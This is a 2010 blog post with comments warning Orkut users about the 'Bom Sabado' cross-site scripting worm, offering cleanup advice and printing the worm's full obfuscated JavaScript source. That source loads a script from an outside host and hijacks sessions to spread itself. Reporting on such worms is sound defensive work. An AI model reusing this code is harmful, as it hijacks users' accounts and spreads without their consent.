Recent Articles
View More Articles

Orkut attacked by 'Bom Sabado' worm

Saturday, September 25, 2010| Surbhi Verma



‘Bom Sabado!’‘Bom Sabado!’‘Bom Sabado!’ 
Hi Friends, Did you find this scrap in your scrapbook from many of your friends??? If yes, then dont visit the profile of person from which this message has come, coz ur friend profile is now infected my a Virus named..‘Bom Sabado!’. If you visit any affected profile, your profile and ur system will also get affect by this Virus!!! 



What is ‘Bom Sabado!’?
'Bom Sabado' is a new worm of type XSS (cross-site scripting) attack, which is created by keeping total focus on Orkut. 
'Bom Sabado' is a Portuguese word which means 'Good saturday.'
Only one country is there in which Orkut is still no. 1 in social websites, So it is assumed that someone has made this virus to attack on the popularity of Orkut.


How it works?
When any one open page that is infected by this worm. A JavaScript(form http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) will run automatically.which will automatically join some communities and send scrap to your friends with text “Bom Sabado!” with a iFrame code which load that JavaScript again for your friends and they will join communities and send links to their friends. Also this worm steal cookies from your browser. 


Orkut has Temporarily Fixed the issue.
On Orkut Support Forums, its declared by a 'Top Contributor' that Orkut has Temporarily Fixed the issue. 
Here what can be meant by temporarily... what i guess.. they have only removed the java script from the site http://tptools.org, but it will take time to Fix this 'Hole of Orkut' to save Orkut  in coming times. so Just Be Aware!!!

I will suggest you all to Disable JavaScript of your Browser, to avoid this type of problem :) 


Suggestion for users Affected by Bom Sabado
As This virus steal cookies from browser, so it is suggested to clear ur browser's cookies immediately and change your all passwords.

Coding of Bom Sabado Worm taken from http://tptools.org/
var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77","\x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6F\x6B\x3F","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64\x3B","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x26\x73\x63\x72\x61\x70\x54\x65\x78\x74\x3D","\x3C\x73\x74\x79\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x73\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x23\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21","\x26\x75\x69\x64\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\x75\x62\x6D\x69\x74\x3D\x31","\x73\x65\x6E\x64","\x47\x45\x54","\x52\x65\x71\x75\x65\x73\x74\x46\x72\x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x26\x75\x69\x64\x3D","\x75\x69\x64","\x26\x6F\x78\x68\x3D\x31","\x77\x68\x69\x6C\x65\x20\x28\x74\x72\x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x54\x26\x26\x26","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\x6E\x3F\x63\x6D\x6D\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x6A\x6F\x69\x6E\x3D\x31","\x31\x30\x36\x36\x39\x38\x38\x30\x38","\x36","\x35\x35\x38\x34\x39\x34","\x31\x30\x36\x36\x39\x38\x36\x32\x38","\x31\x30\x36\x36\x39\x31\x33\x34\x31","\x76\x61\x72\x20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20","\x3B","\x6C\x69\x73\x74","\x64\x61\x74\x61","\x69\x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;






All readers are most welcomed to share their experience with these kind of Viruses attacks!!! 

Bookmark and Share
Posted in Orkut Tips

6 comments for this post


  1. deepa kashyap
    September 25, 2010 at 4:45 PM

    hey thanks a lot as i checked my scrapbook i saw msg like that only ‘Bom Sabado' i was about to scrap him what does it means, in the meanwhile checked your post and oo god that's virus attack !!
    what if i will hide that scrap??


  2. Sn34k3r
    September 25, 2010 at 7:53 PM

    "Bom Sabado" Bug Creating Problems in Orkut


    what is bom sabado, bom sabado meaning, meaning of bom sabado, bom sabado means, bom sabado!

    Today in morning i saw every account was posting scrap some thing like bomb amungu or Bom Sabado.

    And thos who all are reading this scrap even in their profile, their cookies are also stoled and so they are also posting scrap automatically to their friend list same scrap as bomb something like :(

    The script is runnign on and also in status of profile their flag is coming. i mean status are automatically updated in some profile. Its their flag of Brazil. Already Google team are working on it.

    By the Bom Sabado means Good Saturday

    Currently what u should do is
    Solutions:-
    Follow these steps:

    1. Immediately change your password and security question{ including secondary email and mobile number if they also got changed.) This will solve the problem.

    2. Find out whether some communities has been joined automatically. if yeah, do remove them.

    3. If your account has been completely hacked, see here:

    http://www.google.com/support/forum/p/orkut/thread?tid=39fa418ed1162078&hl=en
    4. Always remember these points :

    4.1 Donot ever login to any site rather than www.orkut.com

    4.2 Donot ever run any javascripts while logged into your orkut account

    4.3 Never use any flooder in your account

    4.4 Donot ever share your password with anyone else and keep changing your password regularly.

    4.5 Donot ever click suspicious link while logged into Orkut a/c. if you are curious you can copy the link and check them in
    other browser after cleaning it's browser's cookie and cache.

    4.6 Donot ever install any suspicious script on greasemoneky and ALWAYS DIABLE THE GM before logging in to orkut.

    4.7 Do your mobile verification also, so that you can get back your a/c if hacker doesn't change the mobile number there.
    http://www.orkut.co.in/Main#MobileSetupSettings

    4.8 Install a good Update Ant ivirus and Anti Key logger and keep your system free from Key loggers and backdoor trojans.

    4.9 Use Virtual Keyboard to enter your password for more securite. KIS 2010 provides it and there are many other V.
    keyboards available.

    Take a look here and follow the points given to protect your a/c:
    http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=57442
    and
    http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=48579
    hope this helps you...;)

    happy Orkutting..


  3. Surbhi Verma
    September 26, 2010 at 12:09 AM

    @Deepa....No need to hide scrap, the problem is fixed now :)
    But be aware for future.. never check the affected profile in future, if again this type of msg come!!!!


  4. sudhansh jain
    September 26, 2010 at 7:44 AM

    Yeah i have also got some scraps like that ...but thnk god my profile is not affected by that!!


  5. LoGaN
    September 26, 2010 at 5:03 PM

    If the browser is ran sandboxed, with that "Sandboxie" tool you gave, will it prevent the system from virus or the orkut profile to any extent ?


  6. Surbhi Verma
    September 28, 2010 at 8:20 PM

    @Logan... very gud question....
    well in these types of attack in which the hacker steal cookies of browser, then sandboxie could not also protect the users, coz if u run your browser in sanbox, still then if u keep save passwords, then it will be accessible by sandbox means it can be hacked by cooking stealer's.

Leave a reply

Newer Post
Older Post
Subscribe to: Post Comments (Atom)
TechByte4U on Facebook
Popular Posts